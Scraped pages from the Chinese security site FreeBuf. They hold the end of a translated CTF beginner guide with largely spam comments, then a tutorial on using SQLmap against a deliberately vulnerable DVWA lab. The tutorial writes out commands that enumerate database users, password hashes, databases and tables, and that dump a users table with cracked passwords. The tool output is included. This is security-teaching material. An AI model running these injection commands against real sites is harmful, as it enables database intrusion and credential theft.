4、web漏洞。有很多的网络编程技术,在CTF中最流行的就是PHP和SQL。php.net网站(译者注:需翻墙)是一个梦幻的语言参考,只要搜索你好奇的功能。PHP之后,看到网页上存在的挑战的最常见的方法就是使用Python或Ruby脚本。主要到技术有重叠,这有一本关于网络安全漏洞的好书,是《黑客攻防技术宝典:Web实战篇》。除此之外,在学习了一些基本技术之后,你可能也想通过比较流行的免费软件工具来取得一些经验。这些在CTF竞争中也可能会偶尔用到,这些加密会和你凭经验得到的加密重叠。

5、二进制练习。这是我个人的爱好,我建议你在进入二进制练习前要完成逆向工程的学习。这有几个你可以独立学习的常见类型漏洞:栈溢出,堆溢出,对于初学者的格式字符串漏洞。很多是通过练习思维来辨别漏洞的类型。学习以往的漏洞是进入二进制门槛的最好途径。推荐你可以阅读:

《黑客:漏洞发掘的艺术》

《黑客攻防技术宝典:系统实战篇》

《The Art of Software Security Assessment》

6)取证/网络。大多数的CTF团队往往有“一个”负责取证的人。我不是那种人,但是我建议你学习如何使用010 hex editor,不要怕做出荒谬、疯狂、随机的猜测这些问题运行的结果是怎样。

最后,Dan Guido和公司最近推出了CTF领域指南,会对以上几个主题的介绍有很好的帮助。

(全文完)

更多精彩# CTF# 夺旗比赛# 黑客竞赛
IDF_Lab
IDF_Lab
25 篇文章
等级: 5级
||
相关推荐

10个问题帮您厘清什么是CTF

如何让攻防比赛有价值?举办CTF前先回答这10个问题

CTF顶级工具与资源

Z3Py在CTF逆向中的运用

CTF顶级工具与资源

CTF工具集合安装脚本操作姿势

【FreeBuf字幕组】CTF难题挑战:滥用异常处理程序以泄漏flag(32C3CTF)

专访BCTF八强战队sigma:不为别的,只为了心中的梦

这些评论亮了

anlfi(5级)回复
How to get started in ctf?
The First setp. Get Answering system shell . like HMAC Code execution bypass adminlogin
Second step. copy flag to you Hard Drive
Third step. post the flag one by one in system
So you can get money and Honor come back home
)70(亮了

wakda(1级)回复
英语是硬伤啊
)15(亮了

Daz回复
? ? ? shitsco那个明明考察点是set和show选项里面的uaf漏洞,竟然被他用单字节爆password的方式做出来了。。。出题人知道估计都哭了
)12(亮了

我是英语渣回复
但是我要以一种鄙视的心态看待英语!!!比中文的难度要差100倍!!!
哈哈哈哈哈哈哈!
)7(亮了
发表评论已有 36 条评论

wakda (1级) 2014-06-20回复1楼
英语是硬伤啊

亮了(15)

我是英语渣 2014-06-20回复2楼
但是我要以一种鄙视的心态看待英语!!!比中文的难度要差100倍!!!

哈哈哈哈哈哈哈!

亮了(7)

MaxPower 2014-06-20回复3楼
英语的重要性体现得淋漓尽致。。。

亮了(2)

张旭k 2014-06-20回复4楼
[得意地笑]卖报歌。哈哈。

亮了(0)

黑黑的白猫 (2级) 2014-06-20回复5楼

亮了(0)

Kibodwapon 2014-06-20回复6楼
抽空把这些书看一遍

亮了(0)

么么哒 2014-06-21回复7楼
没人吐槽翻译?

亮了(0)

justjudger 2014-06-21回复8楼
转发微博

亮了(0)

anlfi (5级) 2014-06-21回复9楼
How to get started in ctf?

The First setp. Get Answering system shell . like HMAC Code execution bypass adminlogin

Second step. copy flag to you Hard Drive

Third step. post the flag one by one in system

So you can get money and Honor come back home

亮了(70)

Daz 2014-06-21回复10楼
? ? ? shitsco那个明明考察点是set和show选项里面的uaf漏洞,竟然被他用单字节爆password的方式做出来了。。。出题人知道估计都哭了

亮了(12)

阿尔法之梦 专栏作者(3级) 2014-06-23回复11楼
good job

亮了(0)

贩ritavis河蟹 2014-07-02回复12楼
8错8错 我喜欢 支持你没道理 地址:

亮了(0)

ctffan 2015-03-29回复13楼
可以配合合天网安实验室的CTF解题实验学习,有真实环境还是不错的。

亮了(3)

CTFdreaming 2015-09-23回复14楼
即将踏入CTF的编程,在这条路上,一往无悔,谢谢指导

亮了(1)

zoonctrl (6级)该怎么做好信息安全? 2015-11-20回复15楼
这英语好烂

亮了(1)

freebuf_pgp (1级) 2016-06-11回复16楼
感谢黑客老鹰的分享指点

亮了(0)

0x0sb (1级) 2016-07-19回复17楼
我居然能看懂英文。\(^o^)/~

亮了(0)

爱豆人的马小跳 (1级) 2016-09-08回复18楼
Appreciate!!!!

亮了(0)

dooiit 2017-07-10回复19楼
You can buy from our large and diverse collection of salwar kameez, party wear suits, bollywood collection, cotton kurtis, Anarrkali suits,Bollywood saree and many other products…..

We Have Some For You In Your Budget For more…

Plz visit RakshaBandhan Images

亮了(0)

ZAPY Stores 2017-07-11回复20楼
Find the wedding dress of your dreams by browsing thousands of dresses in popular styles. In wedding dress gallery, you can search by and view a-line, ball gown, mermaid, and sheath wedding dresses. For more… Prom Dresses

亮了(0)

Independence Day Speech 2017-07-18回复21楼
Independence Day on Speech give to you and History,Quotes,images avilable.150 word,200 words like speech

ready in this artical.And maultiple images provided.

Plz visit:- Independence Day Speech

亮了(0)

Tomorrowland2017 2017-07-18回复22楼
Tomorrowland 2017 in clebration of this festival related all information provided in our article.

Like timeing,rules and regulation,weekand date.etc.

Plz visit:- Tomorrowland2017

亮了(0)

Janmashtami 2017-07-19回复23楼
在Janmashtami上,克里希纳阁下的许多奉献者一整天都在观察一下,敬拜他,听他的故事,背诵吉他的赞美诗,唱虔诚的歌,诵读咒语。歌舞跳舞庆祝这个节日。在午夜,婴儿克里希纳的雕像被沐浴,放在一个摇篮里摇摆,在海螺贝壳的轰鸣声和响铃的响声中。

为了更多

Plz访问: – Janmashtami

亮了(0)

Janmashtami 2017-07-19回复24楼
Janmashtami也被不同地称为“Gokulashtami”或“Gupt Vrindavan”,克里希纳爵士奉献的神圣位置标志着他的出生周年纪念,并且在印度已经观察了几个世纪,不仅是印度教徒,还有许多其他宗教团体的成员。

为了更多

Plz访问: – Janmashtami 2017

亮了(0)

独立日 2017-07-20回复25楼
独立日庆祝不同和差异世界各地的日期。有乐趣的传统,以及如何利用这个假期。查找有关独立日图片,行情,语音祝福,状态和庆典等理念欲了解更多…

请访问独立日的图片

亮了(0)

独立日 2017-07-20回复26楼
随着印度庆祝2017年8月15日第70独立日,国民欢欣鼓舞庆祝别样的自由 – 自由旅行,探索和放松。印度公民都竖起了独立日在一个期待已久的长周末。

请访问独立日

亮了(0)

Dooiitt 2017-07-20回复27楼
即使在今天的高速世界中,人们似乎也在处理网速慢。

有一些小而有效的东西,你可以做。

查看我关于如何增加您的Reliance Jio网络速度的提示。

增加Jio速度

亮了(0)

Independence Day 2017 2017-07-25回复28楼
How do you plan to celebrate the 15th of August? From testing your trivia to making your own national flag, there are numerous ways to make this day extremely special…. August 15th being Independence Day for The India is an occasion to celebrate and make merry. Every state in India has its special events and festivities.

Please visit Independence Day 2017

亮了(0)

Independence Day Wishes 2017-07-25回复29楼
I want to wish a hearty 15th of August to all Indians in the nation. It’s the time of the year to be patriotic and to reflect on the roots of our republic. Blood was spilled to gain our independence and I’m sure you’d agree there has never been, and will. God Bless India.

Please visit Independence Day Wishes

亮了(0)

Friendship Day 2017-07-31回复30楼
朋友是如此独特和特别,有一个特别的日子作为友谊日。 在这一天,朋友们以更多的方式重视与他人的友谊。

普茨访问: – 友谊日

应该永远选择一个礼物,特别是如果一个朋友给他或她的友谊日。 应该选择礼物,记住你的朋友的口味和喜好。

普茨访问: – 友谊日祝福

亮了(0)

Ghagra Choli 2017-08-09回复31楼
设计师Ghagra Choli也许是每一个女孩在这个世界上看起来惊人她的婚礼当天的愿望。

新娘必须是在婚礼会场show.The最美丽的女人星这固然重要。

在印度,Ghagra Choli是为brides.There最明显的选择是很多设计师Ghagra Choli在我们的网站…

欲了解更多…

PLZ访问: – Ghagra Choli

亮了(1)

Ganesh Chaturthi Wishes 2017-08-22回复32楼
We always come up with the ultimate collection for the upcoming Ganesh Chaturthi Festivals. Hence, this time we have make sure to collection all type of Ganesh Chaturthi Wishes, Ganesh Chaturthi Quotes, Ganesh Chaturthi Greetings, Ganesh Chaturthi SMS.

Please visit Ganesh Chaturthi Wishes

Ganesh Chaturthi or Ganesh Festival is a day on which Lord Ganesha, the 2nd son of Shiva and Parvati, is believed to bestow his presence on earth for all his devotees. It is also known as Vinayaka Chaturthi or Vinayaka Chavithi in others Indian languages. It is celebrated as it is the birthday of Lord Ganesha.

Please visit Ganesh Chaturthi Images

亮了(0)

tiya patel 2017-08-25回复33楼
设计师Sarees是世界上最美丽的女性之一。题运行结果

新娘必须是展示的明星当然是重要的。婚礼场地最美丽的女人。

在印度,设计师Sarees是新娘最明显的选择。在我们的网站有很多设计师Sarees …

更多…

Plz访问: – 设计师Sarees

亮了(0)

siya23 2017-09-13回复34楼
https://ultra-lehenga.tumblr.com Lehenga

https://buy-saree.tumblr.com/ Saree

https://designer-gown.tumblr.com/ Gown

https://bridallehenga.tumblr.com/ Brindal Lehenga

https://pakistani-dress.tumblr.com/ Pakistani Dress

https://buydesigner-saree.tumblr.com Designer Saree

https://wedding-lehenga.tumblr.com/ Wedding Lehenga

https://buy-salwarkameez.tumblr.com Salwar Kameez

https://salwar-suit.tumblr.com/ Salwar Suit

https://buy-anarkalisuit.tumblr.com Anarkali Suit

https://anarkali-dress.tumblr.com/ Anarkali Dress

https://punjabi-dress.tumblr.com/ Punjabi Dress

https://wedding-saree.tumblr.com/ Wedding Saree

https://buy-lehenga-choli.tumblr.com/ Lehenga Choli

https://ghagra-choli.tumblr.com/ Ghagra Choli

https://silk-saree.tumblr.com/ Silk Saree

https://ladies-suit.tumblr.com Ladies Suit

https://buy-indian-saree.tumblr.com Indian Saree

https://designer-dress.tumblr.com/ Designer Dress

https://bridal-dress.tumblr.com/ Brindal Dress

https://buy-kurti.tumblr.com Kurti

https://buy-designer-kurti.tumblr.com/ Designer Kurti

https://buy-wedding-dresses.tumblr.com/ Wedding Dresss

https://buy-punjabi-suit.tumblr.com/ Punjabi Suit

亮了(0)

Neal Lovins 2018-11-23回复35楼
Hi

We choose our top Black Friday deals, with our experts with more than 70% discount!

All the best Black Friday 2018 deals will be right here http://bit.ly/TheBestBlackFridayDeals2018

Greetings

Unsubscribe from the list, Please sent your Websiteaddres to Tessastout99@gmail.com

亮了(0)

Aly Chiman 2019-01-02回复36楼
Hello there,

My name is Aly and I would like to know if you would have any interest to have your website here at freebuf.com promoted as a resource on our blog alychidesign.com ?

We are in the midst of updating our broken link resources to include current and up to date resources for our readers. Our resource links are manually approved allowing us to mark a link as a do-follow link as well

.

If you may be interested please in being included as a resource on our blog, please let me know.

Thanks,

Aly

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
IDF_Lab
IDF_Lab认证作者

IDF极安客实验室:追求极致安全的极客生活,关注互联网威胁情报、暗网、区块链与智能安全,支持儿童安全领域为主的技术公益

25
文章数
3
评论数
0
关注者

关注
最近文章
技术分析:时尚时尚最时尚的缓冲区溢出攻击
2015.03.05

如何科学的抢红包:年末致富有新招,写个程序抢红包
2015.02.13

俄罗斯网络威胁概览
2014.12.24

浏览更多
相关阅读
BCTF Write-up:他乡遇故知SECCON 2015 CTF精选:一道400分的Android APK逆向题屌丝の逆袭——如何干掉一个黑客CTF逆向题中的编程技巧看雪CTF晋级赛Q1已开战,battle起来!
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

sqlmap

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
SQL注入之SQLmap入门Taskiller2014-03-27金币奖励+19共9630874人围观 ,发现 53 个不明物体WEB安全
什么是SQLmap?
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/

SQLmap的作者是谁?
Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过bernardo@sqlmap.org与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过miroslav@sqlmap.org与他联系。

同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。

执行SQLmap的命令是什么?
进入sqlmap.py所在的目录,执行以下命令:

#python sqlmap.py -h
(译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)

SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。

如何使用SQLmap:
为方便演示,我们创建两个虚拟机:

1、受害者机器, windows XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。

2、攻击器机器,使用Ubuntu 12.04,包含SQLmap程序。

本次实验的目的:使用SQLmap得到以下信息:

3、枚举MYSQL用户名与密码。

4、枚举所有数据库。

5、枚举指定数据库的数据表。

6、枚举指定数据表中的所有用户名与密码。

使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。

SQL入门

当前得到的cookie为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

为方便演示,我们将DVWA安全等级设置为low:

SQL入门

接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
因此该页面就是我们的目标页面。

以下命令可以用来检索当前数据库和当前用户:

“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
使用选项:
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”

2、-u : 指定目标URL

3、-b : 获取DBMS banner

4、–current-db : 获取当前数据库

5、–current-user:获取当前用户

结果如下:

SQL入门

可以看到结果如下:

DBMS : MySQLversion 5.0
OS versionUbuntu 12.04
current user:root
current db :DVWA
以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” –string=”Surname” –users –password”
使用选项:
1、–string : 当查询可用时用来匹配页面中的字符串

2、–users : 枚举DBMS用户

3、–password : 枚举DBMS用户密码hash

SQL入门

结果如下:

databasemanagement system users [142]:
[*] ”@’kingasmk’
[*]”@’localhost’
[*]‘debian-sys-maint’@’localhost’
[*]‘phpmyadmin’@’localhost’
[*]‘root’@’127.0.0.1′
[*] ‘root’@’::1′
[*]‘root’@’kingasmk’
[*]‘root’@’localhost’
数据库管理系统用户和密码hash:

[*]debian-sys-maint [1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] phpmyadmin[1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] root [4]:
password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” –dbs”
使用选项:
–dbs: 枚举DBMS中的数据库

SQL入门

结果如下:

availabledatabases [5]:
[*]dvwa
[*]information_schema
[*]mysql
[*]performance_schema
[*]phpmyadmin
下面我们尝试枚举DVWA数据表,执行以下命令:

“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa –tables”
使用选项:
1、-D : 要枚举的DBMS数据库

2、–tables : 枚举DBMS数据库中的数据表

SQL入门

得到结果如下:

Database: dvwa
[2 tables]
+————+
| guestbook |
| users |
+————+
下面获取用户表的列,命令如下:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users –columns”
使用选项:
-T : 要枚举的DBMS数据库表

–columns : 枚举DBMS数据库表中的所有列

SQL入门

结果如下:

Database: dvwa
Table: users
[6 columns]
+————+————-+
| Column | Type|
+————+————-+
| avatar |varchar(70) |
| first_name |varchar(15) |
| last_name |varchar(15) |
| password |varchar(32) |
| user |varchar(15) |
| user_id |int(6) |
+————+————-+
如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password –dump”
使用选项:

-T : 要枚举的DBMS数据表

-C: 要枚举的DBMS数据表中的列

–dump : 转储DBMS数据表项

SQLmap会提问是否破解密码,按回车确认:

SQL入门

得到所有用户名与明文密码如下:

Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+
这时我们就可以利用admin帐户登录做任何事了。

总结:

SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。

[via infosecinstitute]

更多精彩# events# SqlMap# SQL注入
Taskiller
Taskiller
29 篇文章
等级: 5级
||
相关推荐

Web应用手工渗透测试——用SQLMap进行SQL盲注测试

SQL注入工具 – sqlcake

新手渗透测试训练营——SQL注入

ruby写的SQL注入工具-sqlcake 1.1 发布

FreeBuf公开课:轻松的方式科普什么是SQL注入攻击(第一集)

SQLiv:一款批量SQL注入漏洞扫描工具

你没看错!SQLMap v1.3.10正式发布!

Java GUI界面SQL注入工具 – JSQL

这些评论亮了

那个疼(1级)回复
刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被澳门金沙导航CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.
)254(亮了

WeirdBird007(3级)干过开发,日过渗透,某乙方渗透>_< '...回复 wooyun 发过 两篇 更详细的。。。 http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 )52(亮了 EvilPing(1级)回复 我以为sqlmap是地图那... )35(亮了 敲什么呢i(1级)回复 重复造轮子 )24(亮了 sam回复 @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了 )18(亮了 发表评论已有 53 条评论 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-27回复1楼 ubuntu那个边框是单加上去的吗? 亮了(6) abcd (1级) 2014-03-27回复 @浩天寰宇 vm有这功能 亮了(9) yyyy3333 2014-03-28回复 @abcd 传说叫 无缝结合 亮了(4) 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-31回复 @abcd 我能在KALI下加这么一个条吗 亮了(7) kaliplayer (1级) 2017-04-16回复 @ 浩天寰宇 那个,kali2.0就有边框,不信你试试 亮了(1) 请叫我伪大神 2014-04-09回复 @浩天寰宇 这是ubuntu的桌面,骚年多读读课本 亮了(9) Sarshes 2015-07-02回复 @ 请叫我伪大神 孩子,多读读书… 亮了(4) MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-03-27回复2楼 很好的普及。 亮了(9) mmtt (4级) 2014-03-27回复3楼 渗透必备神器 亮了(5) WeirdBird007 (3级)干过开发,日过渗透,某乙方渗透>_< '... 2014-03-27回复4楼 wooyun 发过 两篇 更详细的。。。 http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 亮了(52) Taskiller (5级) 2014-03-28回复 @WeirdBird007 那两篇详细讲解了各个选项的意思、用法,这一篇是一个简单的具体实例,我个人不认为这是冲突的 亮了(9) lisp 2014-03-27回复5楼 希望可以多发表些技巧和专业性更强的文章 sqlmap很多高级用法和高级场景,从来没见人发表 我想很多人研究过sqlmap的源码 但是没人发个文 又不是做黑产,没必要藏着掖着 亮了(4) sam 2014-03-28回复 @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了 亮了(18) 敲什么呢i (1级) 2014-03-27回复6楼 重复造轮子 亮了(24) Flincllck (1级) 2014-03-27回复7楼 这个不是 metasploit魔鬼训练营 里面的案例讲解吗? 亮了(2) Taskiller (5级) 2014-03-28回复 @Flincllck 没有买这本书,请帮忙确认一下,谢谢,如果这篇文章确实和书上的东西都一样,我会联系小编请他把这篇文章拿掉。 亮了(6) luom 2014-03-27回复8楼 –suffix –perfix –os-pwn –threads 呢? 这些简单的功能 百度 一大推 亮了(2) 李彦宏 2014-03-28回复9楼 终于见到map了,在茫茫盘海中,我就把服务器权限给你,没个一二百年你也拖不完呀~~~ 亮了(8) lisp 2014-03-28回复 @李彦宏 亲爱的,不解释 亮了(4) tink 2014-03-28回复10楼 这是是明目张胆发文刷币吗 亮了(5) ovens (3级) 2014-03-28回复11楼 这也可以过? 明天我也刷币玩玩 亮了(3) evan-css (1级) 2014-03-28回复12楼 有没有DVWA High级别的SQLMap使用方法? 亮了(3) xiao_hen (4级)人是无法在快乐中成长的。快乐只能使人肤浅,我们在痛苦中成长,... 2014-03-28回复 @evan-css 哈,一块期待。 亮了(2) chenyoufu123 2014-03-28回复13楼 haoba, wo juede ma shang jiu lun wei heike jidi de shui ping le 亮了(3) 周鸿祎 2014-03-28回复14楼 搞什么飞机! http://resources.infosecinstitute.com/sql-injection/ 亮了(7) April_2nd 2014-03-28回复15楼 为什么我下载的源码会报错呢 File "./sqlmap.py", line 119 finally: ^ SyntaxError: invalid syntax 亮了(5) downtown 2017-07-18回复 @ April_2nd python版本过低,不支持finally关键字 亮了(0) mark 2014-03-28回复16楼 雨夜Climb,收藏成功。请访问 稍后再读! 你可以关注 获得私信提醒。 亮了(1) 带脚镣跳舞 2014-03-28回复17楼 威武 亮了(2) 雨夜Climb 2014-03-28回复18楼 好! 亮了(1) jinifly 2014-03-28回复19楼 mark 亮了(2) 深圳流浪人008 2014-03-28回复20楼 可爱 亮了(2) 那个疼 (1级) 2014-03-28回复21楼 刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被澳门金沙导航CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.

亮了(254)

whoami 2017-12-10回复
@ 那个疼 他是不是以为是nmap

亮了(1)

pinnnk。 (3级) 2014-03-31回复22楼
要是有windows下的 就更好了~

亮了(3)

无才布衣 (4级) 2014-04-01回复
@pinnnk。 sqlmap win下也可以用的

亮了(2)

alex57xp32 (1级) 2014-07-18回复
@pinnnk。 sqlmap是python。。懂嘛,跨平台的。

亮了(2)

expertwk (1级) 2014-04-01回复23楼
good!

亮了(2)

chenyoufu123 2014-04-01回复24楼
谁牛逼发个dvwa high级别的sqli注入上来

亮了(7)

浩天寰宇 (3级)猴子是我请来的逗比~ 2014-04-10回复
@chenyoufu123 同求

亮了(3)

chenyoufu123 2014-04-01回复25楼
为什么这个文章有19个金币?

亮了(2)

MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后… 2014-04-01回复26楼
– – +19的金币是如何考虑的?

亮了(4)

FB客服 认证作者(9级)FreeBuf官方客服 2014-04-01回复
@MeirLin FB有专门的文章评审团队,评审组里每个成员会对每篇需要加金币的文章进行评分,最后取平均值作为该文的最终得分。

亮了(3)

EvilPing (1级) 2014-04-05回复27楼
我以为sqlmap是地图那…

亮了(35)

蛋蛋一号_ 2014-04-13回复28楼
转发微博

亮了(2)

seeyoulater 2014-05-19回复29楼
sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password –dump

users和-C之间少了一个空格

亮了(6)

VINCE67 (1级) 2014-06-04回复30楼
nice

亮了(1)

mudongliangabcd (2级)信息安全方向研究生,Debian使用者及拥护者! 2015-05-30回复31楼
按照作者的方法去做第一步就没有成功!我用的官方的owasp虚拟机!这个版本在进入sqli时有一个登录的过程!

亮了(5)

zoonctrl (6级)该怎么做好信息安全? 2015-10-08回复32楼
写的比较简单

亮了(3)

bluerainerz (1级) 2016-01-27回复33楼
:mrgreen: 看来注入还是的使用linux系统才够高端。

亮了(3)

buildall (1级) 2016-11-28回复34楼
以下命令可以用来检索当前数据库和当前用户:

“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

那个cookie的前面缺了个杠杠。。

亮了(4)

Bur_Ning (1级)小白一枚 大神多指教 2017-06-12回复35楼
新人一枚,按照文章做了一遍,有收获。 ?

亮了(0)

Abraham·Cong (1级) 2017-07-17回复36楼
分享的文件被人删除了

亮了(3)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
Taskiller
Taskiller

这家伙太懒,还未填写个人描述!

29
文章数
14
评论数
1
关注者

关注
最近文章
玩转Google的XSS游戏
2014.06.09

使用portspoof调戏网络攻击者
2014.05.14

开源BUG跟踪平台JIRA目录遍历漏洞分析
2014.05.14

浏览更多
文章目录

什么是SQLmap?
SQLmap的作者是谁?
执行SQLmap的命令是什么?
如何使用SQLmap:
使用选项:
使用选项:
使用选项:
使用选项:
使用选项:
相关阅读
FireEye:2013年度APT攻击报告这位俄罗斯赌场黑客通过破解老虎机赚了几百万美元(下集)对S-CMS的一次全面审计关注漏洞盒子订阅号,即有机会获取门票 FREE TALK?北京站超详细SQLMap使用攻略及技巧分享
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

什么是SQLmap?
SQLmap的作者是谁?
执行SQLmap的命令是什么?
如何使用SQLmap:
使用选项:
使用选项:
使用选项:
使用选项:
使用选项:
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

互联网安全

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
信息安全意识培训可以这样做PreviousNext
发布阿里巴巴发布新一代安全架构

招聘斗象科技2020春季安全技术专场

最新
观点
深度
报告
视频
活动
分类
对一次钓鱼事件的分析网络安全
对一次钓鱼事件的分析一个神秘的人2020-03-31 本文是对一次钓鱼事件的分析,在下水平实在不高,请路过的高手勿喷。像网络钓鱼这种违法事件时不时地出现在我们身边,下面是本人的亲身经历。网络安全已有 28674 人围观 ,发现 12 个不明物体Projectsandcastle:一款针对iPhone的AndroidLinux支持工具工具
Projectsandcastle:一款针对iPhone的AndroidLinux支持工具Alpha_h4ck2020-03-31 Projectsandcastle是一款针对iPhone的Android/Linux支持工具,该工具可以给广大研究人员提供以下实用工具。工具系统安全已有 8053 人围观从零开始学习fastjson反序列化漏洞
从零开始学习fastjson反序列化打大狼2020-03-31 JDK提供了API可以将Java对象转换为字节序列保存在磁盘或网络传输,接收方可以把字节序列再恢复为Java对象。漏洞已有 1741 人围观关于俄罗斯联邦安全局FSB承包商0day公司的秘辛网络安全
关于俄罗斯联邦安全局FSB承包商0day公司的秘辛奇安信威胁情报中心认证厂商2020-03-31 俄罗斯联邦安全局,简称FSB,作为克格勃的继任者,主要负责联邦安全,包括反情报,内部以及边境安全,反恐和监视,以及调查其他一些严重罪行和违反联邦法律的行为。网络安全已有 7086 人围观 ,发现 3 个不明物体

细品新政策法规下的APP个人信息收集检测
TideSec
TideSec 303824
Tide安全团队,期待您的加入。www.TideSec.com

关注

